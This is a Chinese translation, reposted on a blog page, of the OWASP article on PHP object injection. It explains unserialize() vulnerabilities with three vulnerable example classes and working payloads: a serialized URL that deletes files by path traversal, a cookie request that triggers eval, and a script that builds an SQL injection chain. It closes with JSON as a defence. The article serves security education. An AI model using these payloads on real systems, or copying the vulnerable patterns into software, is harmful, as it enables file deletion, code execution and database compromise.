PHP对象注入 PHP Object Injection

最新推荐文章于 2022-09-20 08:58:16 发布
最新推荐文章于 2022-09-20 08:58:16 发布
阅读量171 收藏
点赞数
文章标签: php json
原文链接:http://www.cnblogs.com/liqiuhao/p/6900872.html
版权


From:PHP Object Injection
Last revision (mm/dd/yy): 01/7/2015
译者:李秋豪 Wednesday, 24. May 2017 05:48PM

描述

PHP对象注入是一个允许骇客展开各种恶意攻击的应用级漏洞,比如说代码注入SQL注入目录遍历应用程序拒绝服务 (取决于具体的上下文/环境)。当用户的请求在传给反序列化函数unserialize()之前没有被正确的过滤时就会产生该漏洞。因为PHP允许对象序列化,攻击者就可以提交特定的序列化的字符串给一个具有该漏洞的unserialize函数,最终导致一个在该应用范围内的任意PHP对象注入。

为了正确的利用一个PHP对象注入漏洞,两个条件必须满足:

  1. 该网络应用必须有一个拥有PHP魔术方法(比如说__wakeup或__destruct)的类,以此来承载运行恶意攻击请求或者开始POP chain
  2. 所有攻击过程中利用的类必须在调用unserialize()之前就已经声明了,否则必须有类的自动加载

例子

例一

下面的例子显示了一个具有PHP对象注入漏洞的类(__destruct方法):

class Example1
{
   public $cache_file;

   function __construct()
   {
      // some PHP code...
   }

   function __destruct()
   {
      $file = "/var/www/cache/tmp/{$this->cache_file}";
      if (file_exists($file)) @unlink($file);
   }
}

// some PHP code...

$user_data = unserialize($_GET['data']);

// some PHP code...

在这个例子中,攻击者可以通过目录遍历攻击删掉任意一个文件,例如提交以下一个URL:

http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";}

例二

下面的例子显示了一个具有PHP对象注入漏洞的类(__wakeup方法):

class Example2
{
   private $hook;

   function __construct()
   {
      // some PHP code...
   }

   function __wakeup()
   {
      if (isset($this->hook)) eval($this->hook);
   }
}

// some PHP code...

$user_data = unserialize($_COOKIE['data']);

// some PHP code...

在这个例子中,攻击者可以通过发送如下的HTTP请求来进行代码注入攻击:

GET /vuln.php HTTP/1.0
Host: testsite.com
Cookie: data=O%3A8%3A%22Example2%22%3A1%3A%7Bs%3A14%3A%22%00Example2%00hook%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D
Connection: close

这里的cookie变量“data”是通过下面的脚本产生的:

class Example2
{
   private $hook = "phpinfo();";
}

print urlencode(serialize(new Example2));

例三

最后一个例子展示了利用“POP chain”进行SQL注入的可能性,例如利用一个__toString方法:

class Example3
{
   protected $obj;

   function __construct()
   {
      // some PHP code...
   }

   function __toString()
   {
      if (isset($this->obj)) return $this->obj->getValue();
   }
}

// some PHP code...

$user_data = unserialize($_POST['data']);

// some PHP code...

如果$user_data是一个“Example3”类的对象并且它在代码中会被当做一个字符串,那么它的__toString方法就会被调用。因为__toString会调用对象中的getValue获取对象中的属性,所以有可能将设置这个属性于任意对象并运行getValue方法——如果可以的话,否则__call方法就会被调用。假设以下类型在应用中是可获得的或者是自动加载的:

class SQL_Row_Value
{
   private $_table;

   // some PHP code...

   function getValue($id)
   {
      $sql = "SELECT * FROM {$this->_table} WHERE id = " . (int)$id;
      $result = mysql_query($sql, $DBFactory::getConnection());
      $row = mysql_fetch_assoc($result);

      return $row['value'];
   }
}

在这个例子中攻击者可能有机会通过提交POST请求进行SQL注入攻击,请求中的“DATA”参量按如下脚本生成:

class SQL_Row_Value
{
   private $_table = "SQL Injection";
}

class Example3
{
   protected $obj;

   function __construct()
   {
      $this->obj = new SQL_Row_Value;
   }
}

print urlencode(serialize(new Example3));

相关的控制方法

防范方法

请不要对用户的输入使用unserialize()进行反序列化,应该使用JSON的方法。

参考

PHP:反序列化
魔术方法
PHP RFC: 安全的反序列化unserialize()
PHP漏洞利用 Stefan Esser, POC 2009
PHP漏洞利用之代码重用/返回导向编程

转载于:https://www.cnblogs.com/liqiuhao/p/6900872.html

a_18067
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP Object InjectionPHP对象注入
Bendawang's Blog
03-18 4767
PHP Object InjectionPHP对象注入
php访问object元素,关于object:获取PHP stdObject中的第一个元素
weixin_42509614的博客
04-09 974
我有一个看起来像这样的对象(存储为$ videos)object(stdClass)#19 (3) { [0]=>object(stdClass)#20 (22) { ["id"]=>string(1)"123"etc...我想得到第一个元素的ID,而不必循环它。如果它是一个数组,我会这样做:$videos[0]['id']它曾经像这样工作:$videos[0]->id但...
Joomla对象注入漏洞分析
weixin_30475039的博客
12-06 215
漏洞简介 jooomla 1.5 到 3.4.5 的所有版本中存在反序列化对象造成对象注入的漏洞,漏洞利用无须登录,直接在前台即可执行任意PHP代码。Joomla 安全团队紧急发布了 Joomla 3.4.6 版本,修复了这个高危 0day 漏洞。 漏洞原理 漏洞存在于反序列化session的过程中,我们可以控制session的值,而且没有过滤我们构造的语句,通过mysql截断原理,在...
WordPress < 3.6.1 PHP 对象注入漏洞
weixin_33877092的博客
03-27 229
0x00 背景 当我读到一篇关于Joomla的“PHP对象注射”的漏洞blog后,我挖深了一点就发现Stefan Esser大神在2010年黑帽大会的文章: http://media.blackhat.com/bh-us-10/presentations/Esser/BlackHat-USA-2010-Esser-Utilizing-Code-Reuse-Or-Return-Oriente...
PHP 读取 object(Closure)
qq_20237191的博客
09-20 1629
使用 ReflectionFunction; 读取 object(Closure)
php对象注入,PHP序列化/对象注入漏洞分析
weixin_30376865的博客
03-11 176
本文是关于PHP序列化/对象注入漏洞分析的短篇,里面讲述了如何获取主机的远程shell。如果你想自行测试这个漏洞,你可以通过 XVWA 和 Kevgir 进行操作。漏洞利用的第一步,我们开始测试目标应用是否存在PHP序列化。为了辅助测试,我们使用了Burpsuite的SuperSerial插件,下载地址在 这里 。它会被动检测PHP和Java序列化的存在。分析我们检测到了应用里使用了PHP序列化,...
php反序列化 先知社区,PHP反序列化的一些例子
weixin_29144993的博客
03-20 423
之前web一直被PHP反序列化的一些问题困扰,现在痛定思痛,决定好好的总结一番(大佬请略过)一般反序列化能用的例子都是利用了PHP中的一些可以自动调用的特殊函数,类似于C++中的构造函数之类的,不需要其他函数调用即可自动运行。通常称这些函数为魔幻函数,常用的魔幻函数包括construct(),destruct(), sleep(),wakeup(), toString().首先我们以constr...
PHP Object Injection
weixin_30472035的博客
07-11 155
http://www.phpchina.com/portal.php?mod=view&aid=39852 https://crowdshield.com/blog.php?name=exploiting-php-serialization-object-injection-vulnerabilities https://www.owasp.org/index.php/PHP_Obj...
php+获取object里的值,php 获取stdClass Object中的值
weixin_35973118的博客
03-10 2135
print_r(json_decode($data));exit;stdClass Object([openId] => oXAn10DtGNKDz421q_ATefmwAgrI[nickName] => 朝游东海[gender] => 1[language] => zh_CN[city] =>[province] =>[country] =>[avata...
深入讲解PHP对象注入(Object Injection)
10-20
主要介绍了PHP对象注入的相关资料,文中通过示例代码介绍的非常详细,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。
关于PHPObject对象的笔记分享
10-28
关于PHPObject对象的笔记分享,学习php面向对象的朋友可以参考下。
PHP对象Object的概念 介绍
10-28
类提供了一个基础,可以在此基础上创建实体(即这个类所建模的实体)的特定实例,这些特定实例称为对象object
object-graph:提供有关PHP对象图的有用操作
04-12
提供对PHP对象图的有用操作。 安装 您可以使用将该库作为本地的,基于项目的依赖项添加到您的项目中: composer require sebastian/object-graph 如果仅在开发过程中需要该库(例如,运行项目的测试套件),则应将...
php 获取object_PHP反射机制实现自动依赖注入
weixin_39777637的博客
11-24 103
依赖注入又叫控制反转,使用过框架的人应该都不陌生。很多人一看名字就觉得是非常高大上的东西,就对它望而却步,今天解开他它的神秘面纱。废话不多说,直接上代码;/** * * 工具类,使用该类来实现自动依赖注入。 * */ class Ioc { // 获得类的对象实例 public static function getInstance($className) { ...
php 对象获取对象名_php如何处理一个对象,并且获取对象元素的值,下面有object?...
weixin_34552961的博客
03-09 362
通过反射函数转化为数组可以处理这样的问题$ref = new ReflectionClass($response);$props = $ref->getProperties();$arr = [];foreach ($props as $prop) {$prop->setAccessible(true);$arr[$prop->getName()] = $prop->get...
PHP 如何获取stdClass Object里面每个参数的值
hxb_123_hxb的博客
07-31 7723
以下是json接口返回的数据, &lt;?php $data = stdClass Object (      name = 小红     sex = 女 ) $name = $data-&gt;name; $sex = $data-&gt;sex; ?&gt;  
php 数组转对象
最新发布
05-28
在上面的示例中,我们先定义了一个关联数组 `$array`,然后使用 `(object)` 强制类型转换将其转换为对象 `$obj`。最后,我们可以通过 `$obj->name` 和 `$obj->age` 访问对象的属性。 需要注意的是,这种方式只能将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值